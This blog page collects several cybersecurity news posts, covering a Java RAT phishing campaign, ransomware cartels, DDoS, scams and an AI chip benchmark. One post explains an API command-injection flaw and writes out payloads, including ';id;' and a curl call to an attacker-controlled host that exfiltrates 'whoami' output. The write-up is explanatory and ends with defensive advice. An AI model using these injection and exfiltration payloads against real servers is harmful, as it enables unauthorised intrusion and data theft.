Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label News. Show all posts
trending news
Artificial Intelligence Cerebras News Technology trending news

Cerebras Unveils World’s Fastest AI Chip, Beating Nvidia in Inference Speed

 

In a move that could redefine AI infrastructure, Cerebras Systems showcased its record-breaking Wafer Scale Engine (WSE) chip at Web Summit Vancouver, claiming it now holds the title of the world’s fastest AI inference engine. 

Roughly the size of a dinner plate, the latest WSE chip spans 8.5 inches (22 cm) per side and packs an astonishing 4 trillion transistors — a monumental leap from traditional processors like Intel’s Core i9 (33.5 billion transistors) or Apple’s M2 Max (67 billion). 

The result? A groundbreaking 2,500 tokens per second on Meta’s Llama 4 model, nearly 2.5 times faster than Nvidia’s recently announced benchmark of 1,000 tokens per second. “Inference is where speed matters the most,” said Naor Penso, Chief Information Security Officer at Cerebras. “Last week Nvidia hit 1,000 tokens per second — which is impressive — but today, we’ve surpassed that with 2,500 tokens per second.” 

Inference refers to how AI processes information to generate outputs like text, images, or decisions. Tokens, which can be words or characters, represent the basic units AI uses to interpret and respond. As AI agents take on more complex, multi-step tasks, inference speed becomes increasingly essential. “Agents need to break large tasks into dozens of sub-tasks and communicate between them quickly,” Penso explained. “Slow inference disrupts that entire flow.” 

What sets Cerebras apart isn’t just transistor count — it’s the chip’s design. Unlike Nvidia GPUs that require off-chip memory access, WSE integrates 44GB of high-speed RAM directly on-chip, ensuring ultra-fast data access and reduced latency. Independent benchmarks back Cerebras’ claims. 

Artificial Analysis, a third-party testing agency, confirmed the WSE achieved 2,522 tokens per second on Llama 4, outperforming Nvidia’s new Blackwell GPU (1,038 tokens/sec). “Cerebras is the only inference solution that currently outpaces Blackwell for Meta’s flagship model,” said Artificial Analysis CEO Micah Hill-Smith. 

While CPUs and GPUs have driven AI advancements for decades, Cerebras’ WSE represents a shift toward a new compute paradigm. “This isn’t x86 or ARM, It’s a new architecture designed to supercharge AI workloads,” said Julie Shin, Chief Marketing Officer at Cerebras.
Read more »
PDF malware
cyberattacks trending news malware News PDF malware

Multiplatform Malware Campaign Uses PDF Invoices to Deploy Java-Based RAT

 

A new wave of cyberattacks is sweeping across digital infrastructures globally, leveraging weaponised PDF invoices to infiltrate systems with a sophisticated Java-based Remote Access Trojan (RAT). Security researchers from Fortinet have identified a multi-stage, evasive malware campaign targeting Windows, Linux, and macOS devices, exploiting the cross-platform capabilities of Java to establish remote control over compromised machines. 

The attack chain begins with phishing emails that appear to contain legitimate invoice attachments. These emails pass domain authentication checks—such as SPF validation—by misusing the serviciodecorreo.es mail service, which is permitted to send messages on behalf of numerous domains. The attached PDF lures recipients with urgent invoice-related messaging, prompting them to click embedded buttons that lead to the next stage of infection. 

Once a user interacts with the PDF, they are redirected to a Dropbox-hosted HTML file titled “Fattura”—the Italian word for “invoice.” This file prompts a basic CAPTCHA check before further redirecting the victim to a URL generated by Ngrok, a legitimate tunneling service often abused to conceal malicious activity. 

What makes this campaign particularly difficult to detect is its use of geolocation filtering. Depending on the user’s IP address, the final content differs: users located in Italy receive a Java Archive (JAR) file camouflaged under generic filenames such as “FA-43-03-2025.jar,” while users from other regions are shown an innocuous Google Drive document containing a non-malicious invoice from an entity named Medinova Health Group. This strategy effectively thwarts email security platforms that scan links from centralised cloud environments, which often lack region-specific browsing behaviour. 

If the user downloads and runs the JAR file, a Java-based Remote Access Trojan known as RATty is deployed. This malware allows attackers to execute remote commands, log keystrokes, capture screenshots, access files, and even control webcams and microphones. By exploiting the Java Runtime Environment (JRE), the RAT functions across operating systems, significantly broadening its potential victim base. To further evade detection, the campaign uses trusted platforms like Dropbox and MediaFire to host malicious components. Additionally, Ngrok’s dynamic tunneling service helps the attackers disguise their infrastructure, making attribution and blocking more difficult. 

The attackers have also conducted reconnaissance to identify vulnerable domains, optimising their strategy for maximum penetration and persistence. Security experts warn that the use of such multilayered and cross-platform infection techniques reflects the growing sophistication of threat actors. The campaign not only highlights the critical need for advanced threat detection systems but also reinforces the importance of user awareness, particularly around email-based social engineering tactics. 

Organisations are urged to ensure their endpoint protection tools are updated and to consider restricting the execution of Java applications from unknown sources. Furthermore, robust geofencing-aware email filtering and sandboxing solutions could help in flagging such targeted, region-specific attacks before they escalate.
Read more »
trending news
Cyber Security News Trending trending news

“They're Just People—But Dangerous Ones”: Trellix's John Fokker Unpacks the Blurred Battlefield of Cybercrime at RSA 2025

 

At the RSA Conference 2025, John Fokker, head of threat intelligence at the Trellix Advanced Research Center, issued a stark reminder to the cybersecurity community that the behind of every cyberattack is a human being and the boundaries between criminals and nation-states are rapidly dissolving. Drawing from his experience as a former officer in the Dutch high-tech crime unit, Fokker urged cybersecurity professionals to stop viewing threats as faceless or purely technical. “Cybercriminals are not abstract concepts,” he said. “They’re individuals—ordinary people who happen to be doing bad things behind a keyboard.” 

His keynote speech stressed the importance of not overlooking basic vulnerabilities in the rush to guard against sophisticated attacks. “Attackers still go for the low-hanging fruit—weak passwords, missing patches, and lack of multi-factor authentication,” he noted. A central theme of his address was the convergence of criminal networks and state-backed operations. “What once were clearly separated entities—financially motivated hackers and state actors...are now intertwined,” Fokker said. “Nation-states are increasingly using proxies or outright criminals to carry out espionage and disruption campaigns.” Fokker illustrated this through a case study involving the notorious Black Basta ransomware group. 

He referenced internal communications that surfaced in an investigation, revealing the group’s leader “Oleg" formerly known as “Tramp” in the Conti gang. Oleg was reportedly arrested upon arriving in Armenia from Moscow last year, but escaped custody just days later. According to leaked chats, he claimed Russian officials orchestrated his return using a so-called “green corridor,” allegedly coordinated by a senior government figure referred to as “number one.” While Fokker clarified that these claims remain unverified, he emphasized they are a troubling sign of potential collaboration between state entities and criminal gangs. 

Still, he reminded attendees that attackers are not infallible. He recounted a failed ransomware attack by Black Basta on a U.S. healthcare organization, where the group’s encryption tool malfunctioned. “They had to fall back on threatening to leak data when the original extortion method broke down,” Fokker explained, highlighting that even seasoned attackers are prone to critical errors.
Read more »
trending news
Cyber Security News trending news

Security Researcher Uncovers Critical RCE Flaw in API Due to Incomplete Input Validation

In a recent security evaluation, a researcher discovered a severe remote code execution (RCE) vulnerability caused by improper backend input validation and misplaced reliance on frontend filters. The vulnerability centered on a username field within a target web application. 

On the surface, this field appeared to be protected by a regular expression filter—/^[a-zA-Z0-9]{1,20}$/—which was designed to accept only alphanumeric usernames up to 20 characters long. However, this filtering was enforced exclusively on the frontend via JavaScript. While this setup may prevent casual misuse through the user interface, it offered no protection once the client-side constraints were bypassed. 

The server did not replicate or enforce these restrictions, creating an opportunity for attackers to supply crafted payloads directly to the backend. Client-Side Regex: A False Sense of Security The researcher quickly identified a dangerous assumption built into the application’s architecture: that client-side validation would be sufficient to sanitize input. This approach led the backend to trust incoming data without question. 

By circumventing the web interface and manually crafting HTTP requests, the researcher was able to supply malicious input that would have been blocked by the frontend regex. This demonstrated a critical weakness in security design. The researcher noted that regular expressions should be viewed as tools to assist in user input formatting, not as security mechanisms. 

When frontend validation is treated as a safeguard rather than a convenience, it opens the door to serious vulnerabilities. Bypassing Protections via Alternate HTTP Methods The most significant discovery came when the researcher explored alternate HTTP methods. While the application interface relied on POST requests—where regex filters were enforced—the backend also accepted PUT requests at the same endpoint. These PUT requests were not subjected to any validation, creating a dangerous inconsistency. 

Using a crafted PUT request with the payload username=;id;, the researcher confirmed the ability to inject and execute arbitrary commands. The server’s response to the id command verified the successful exploitation of this oversight. Further probing revealed the potential for more advanced attacks, including out-of-band (OOB) data exfiltration. 

By submitting a payload like username=;curl http://attacker-controlled.com/$(whoami);, the researcher caused the server to initiate a connection to an external domain. This revealed the active user account running on the server, proving that the command had been executed remotely. The absence of a web application firewall (WAF) allowed this traffic to pass unnoticed, making the attack both silent and effective.  
Architectural Oversight and Security Best Practices This case highlighted a widespread architectural flaw: the fragmentation of security logic between frontend and backend layers. Developers frequently assume that if an input field is restricted on the client side, it is secure—overlooking the need to apply the same or stricter rules on the server. This disconnect is what enabled the exploit. 

The API processed data without verifying whether it adhered to expected formats, and alternative HTTP methods were insufficiently monitored or restricted. To address such risks, experts stress the importance of server-side validation as the primary line of defense. Every piece of input data should be rigorously checked against an allowlist of acceptable values before processing. 

Additionally, output should be sanitized to ensure that even if unsafe input slips through, it cannot be used maliciously. Logging and monitoring are also critical, especially for API endpoints that might be vulnerable to tampering. The deployment of a robust WAF could have detected and blocked these unusual request patterns, such as command injection or OOB callbacks, thereby mitigating the threat before damage occurred.
Read more »
News
Bitdefender cyber attack cyberattacks trending news News

Bitdefender Warns of Surge in Subscription Scams Disguised as Online Stores and Mystery Boxes

 

Cybersecurity researchers at Bitdefender have uncovered a sharp increase in deceptive online subscription scams, with fraudsters disguising themselves as legitimate e-commerce platforms and mystery box vendors. These sophisticated schemes are luring unsuspecting users into handing over sensitive credit card details under the guise of low-cost purchases. 

Unlike older, more obvious fraud attempts, this new wave of scams involves meticulously crafted fake websites that mimic real online shops. Bitdefender’s investigation revealed over 200 fraudulent sites offering goods such as footwear, apparel, and electronic gadgets. 

The catch? Victims unknowingly agree to recurring subscription charges cleverly hidden in the fine print. One tactic gaining traction is the so-called “mystery box” scam. These scams entice consumers with a small upfront fee in exchange for a surprise package, often marketed as unclaimed luggage or packages left behind at airports or post offices. 
However, the real goal is to harvest personal and payment information, often enrolling victims in recurring payment plans before the transaction is even finalized. The scams are widely advertised on social media platforms, including Facebook, through sponsored posts. 

In many cases, scammers pose as content creators or use fake influencer pages to build trust. Bitdefender researchers found more than 140 websites pushing these scams, with many traced back to a recurring address in Limassol, Cyprus—an address also linked to entities named in the Paradise Papers by the ICIJ Offshore Leaks Database. 

Some websites go further, advertising discounted “member prices” that require account top-ups, like a charge of €44 every two weeks, often concealed in promotional offers. These scams frequently promote multiple membership levels, using store credits and promises of steep discounts to mask overpriced or outdated products. 

Bitdefender warns that the evolving nature of these scams—complete with high-quality websites, paid advertising, and fake brand endorsements—makes them harder to detect. With the profitability of subscription fraud rising, scammers are scaling their operations, expanding beyond mystery boxes into bogus product sales and investment offers. 

Researchers caution users to stay vigilant while shopping online, especially when prompted to enter payment information for deals that seem too good to be true. As these tactics grow more elaborate, consumers are urged to read the fine print and verify the authenticity of online shops before completing any transactions.
Read more »
News
Anti-DDoS Measures cyber attack DDOS Attack News

Massive 1Tbps DDoS Attack Cripples Online Betting Site, Exposes Industry’s Ongoing Cybersecurity Failures

 

An online betting company has been knocked offline by a colossal 1-terabit-per-second Distributed Denial of Service (DDoS) attack, exposing glaring weaknesses in the digital defences of the gambling industry. Reported by TechRadar, the attack unleashed a massive flood of junk traffic that overwhelmed the site’s infrastructure, rendering its services inaccessible for hours. 

What makes the incident more concerning is the lack of sophistication behind it—this wasn’t a complex, stealthy operation but rather a brute-force flood that succeeded purely through scale. Despite the growing prevalence of such attacks in recent years, many companies in high-risk sectors like online gambling continue to treat cybersecurity as an afterthought. 

With their operations heavily reliant on constant uptime and revenue tied to every second online, gambling platforms remain prime targets for attackers, yet many fail to invest in fundamental protections like cloud-based DDoS mitigation, real-time monitoring, and incident response planning. 

Cybersecurity experts are baffled by this ongoing negligence, especially when previous headline-grabbing attacks—such as the 1.3Tbps assault on GitHub in 2018 or AWS’s 2.3Tbps encounter in 2020—should have prompted serious change. 
Compounding the issue is the role of Internet Service Providers (ISPs), who continue to shy away from proactive upstream filtering, allowing these massive data floods to reach their targets unchecked. The financial impact of such downtime is severe, with potential losses not only in revenue but also in user trust, legal exposure, and long-term brand damage. 

Security professionals stress that effective DDoS defence requires more than just faith in hosting providers; it demands deliberate investment in scalable protection tools like AWS Shield, Cloudflare, or Akamai, along with robust infrastructure redundancy and tested incident response strategies. 

In 2025, DDoS attacks are no longer anomalies—they’re a constant threat woven into the fabric of the internet. Ignoring them is not cost-saving; it’s gambling with disaster.
Read more »
trending news
DragonForce Ransomware Group malware News Ransomware trending news

DragonForce Unveils Cartel-Style Ransomware Model to Attract Affiliates

The ransomware landscape is seeing a shift as DragonForce, a known threat actor, introduces a new business model designed to bring various ransomware groups under a single, cartel-like umbrella. This initiative is aimed at simplifying operations for affiliates while expanding DragonForce’s reach in the cybercrime ecosystem. 

Traditionally, ransomware-as-a-service (RaaS) operations involve developers supplying the malicious tools and infrastructure, while affiliates carry out attacks and manage ransom negotiations. In exchange, developers typically receive up to 30% of the ransom collected. DragonForce’s updated model deviates from this approach by functioning more like a platform-as-a-service, offering its tools and infrastructure for a smaller cut—just 20%. 

Under this new setup, affiliates are allowed to create and operate under their own ransomware brand, all while utilizing DragonForce’s backend systems. These include data storage for exfiltrated files, tools for ransom negotiations, and malware deployment systems. This white-label model allows groups to appear as independent operations while relying on DragonForce’s infrastructure. 

A spokesperson for DragonForce told BleepingComputer that the group operates with clear rules and standards, which all affiliates are expected to follow. Any violations, they say, result in immediate removal from the network. Though these rules aren’t publicly disclosed, the group claims to maintain control since all services run on its servers. 

Interestingly, DragonForce claims it avoids certain targets in the healthcare sector, specifically facilities treating cancer and heart conditions. The group insists its motives are purely financial and not intended to harm vulnerable individuals. Cybersecurity analysts at Secureworks have noted that this new structure could appeal to both inexperienced and seasoned attackers. 

The simplified access to powerful ransomware tools, without the burden of managing infrastructure, lowers the barrier to entry and could lead to a broader adoption among cybercriminals. DragonForce has indicated its platform is open to unlimited affiliate brands capable of targeting a range of systems, including ESXi, NAS, BSD, and Windows environments. 

While the number of affiliates joining the network remains undisclosed, the group claims to have received interest from several prominent ransomware outfits. One such group, RansomBay, is already reported to be participating in the model. As this cartel-style operation gains traction, it could signal a new phase in ransomware operations—where brand diversity masks a centralised, shared infrastructure designed for profit and scalability.
Read more »
trending news
AI Artificial Intelligence Cyber Security mobile fraud News Payment Fraud trending news

Payment Fraud on the Rise: How Businesses Are Fighting Back with AI

The threat of payment fraud is growing rapidly, fueled by the widespread use of digital transactions and evolving cyber tactics. At its core, payment fraud refers to the unauthorized use of someone’s financial information to make illicit transactions. Criminals are increasingly leveraging hardware tools like skimmers and keystroke loggers, as well as malware, to extract sensitive data during legitimate transactions. 

As a result, companies are under mounting pressure to adopt more advanced fraud prevention systems. Credit and debit card fraud continue to dominate fraud cases globally. A recent report by Nilson found that global losses due to payment card fraud reached $33.83 billion in 2023, with nearly half of these losses affecting U.S. cardholders. 

While chip-enabled cards have reduced in-person fraud, online or card-not-present (CNP) fraud has surged. Debit card fraud often results in immediate financial damage to the victim, given its direct link to bank accounts. Meanwhile, mobile payments are vulnerable to tactics like SIM swapping and mobile malware, allowing attackers to hijack user accounts. 

Other methods include wire fraud, identity theft, chargeback fraud, and even check fraud—which, despite a decline in paper check usage, remains a threat through forged or altered checks. In one recent case, customers manipulated ATM systems to deposit fake checks and withdraw funds before detection, resulting in substantial bank losses. Additionally, criminals have turned to synthetic identity creation and AI-generated impersonations to carry out sophisticated schemes.  

However, artificial intelligence is not just a tool for fraudsters—it’s also a powerful ally for defense. Financial institutions are integrating AI into their fraud detection systems. Platforms like Visa Advanced Authorization and Mastercard Decision Intelligence use real-time analytics and machine learning to assess transaction risk and flag suspicious behavior. 

AI-driven firms such as Signifyd and Riskified help businesses prevent fraud by analyzing user behavior, transaction patterns, and device data. The consequences of payment fraud extend beyond financial loss. Businesses also suffer reputational harm, resource strain, and operational disruptions. 

With nearly 60% of companies reporting fraud-related losses exceeding $5 million in 2024, preventive action is crucial. From employee training and risk assessments to AI-powered tools and multi-layered security, organizations are now investing in proactive strategies to protect themselves and their customers from the rising tide of digital fraud.
Read more »
Subscribe to: Posts (Atom)